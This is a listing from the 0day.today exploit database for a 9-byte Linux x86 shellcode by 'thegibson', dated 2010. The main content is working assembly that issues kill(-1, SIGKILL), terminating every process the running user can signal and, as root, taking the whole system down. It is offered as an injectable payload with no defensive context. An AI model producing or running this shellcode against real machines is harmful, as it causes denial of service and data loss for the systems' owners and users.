[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 kill all processes 9 bytes

Author
thegibson
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10093
Category
shellcode
Date add
14-01-2010
Platform
linux/x86
====================================
linux/x86 kill all processes 9 bytes
====================================

; linux/x86 kill all processes 9 bytes
; root@thegibson
; 2010-01-14
 
section .text
        global _start
 
_start:
        ; kill(-1, SIGKILL);
        mov al, 37
        push byte -1
        pop ebx
        mov cl, 9
        int 0x80



#  0day.today [2024-10-05]  #